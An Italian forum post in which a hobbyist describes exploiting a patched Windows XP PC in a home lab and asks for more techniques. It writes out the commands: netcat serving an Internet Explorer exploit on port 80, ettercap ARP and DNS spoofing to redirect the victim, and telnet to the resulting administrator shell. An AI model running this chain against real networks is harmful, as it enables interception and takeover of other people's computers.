-
Jiose.
User deleted
Salve a tutti,
Ultimamente ho un po' di tempo libero e mi sto divertendo a provare tecniche per exploitare windows XP.
La configurazione e' la seguente:
1 pc connesso con Windows XP originale ed aggiornato con firewall configurato "senza eccezioni" ed un antivirus "avira" anche esso aggiornato quotidianamente, connesso direttamente sull' hag di fastweb
1 laptop connesso tramite wireless con ubuntu 10.10
Gli exploit che ho provato, con un sistema aggiornato e senza servizi aggiuntivi, sono perlopiu' inefficaci.
Tranne per quelli che sfruttano le debolezze del browser "Mozilla o Internet Explorer" che si sono rivelati estremamente efficaci ed invisibili sia al firewall che all' antivirus.
La tecnica utilizzata e' la seguente:
Mi connetto alla rete wireless.
Metto in ascolto l'exploit sulla porta 80 del laptop.
Ovvero uso il comando ncCODEnc -l 80 < ./ExploitperIE.txt
Avveleno i DNS rinviando la connessione del pc sull' IP del laptop.
Ovvero uso ettercap per fare un DNS PoisoningCODEettercap -TqP dns_spoof -i "scheda wireless" -M ARP /"IP PC"/
Aspetto il trigger dell' exlpoit.
Sano i DNS.
chiudo ettercap conCODEq
Mi connetto al computer exploitato con privilegi amministrativi.CODEtelnet "IP" "Porta Exploit"
Oltre a questa tecnica, secondo voi, quale altro modo e' altrettanto efficace per exploitare un XP?
P.S.
Non ho provato affatto e non ho intenzione di usare metasploit per due motivi.
1) non e' didatticamente molto interessante
2) e' un mattone.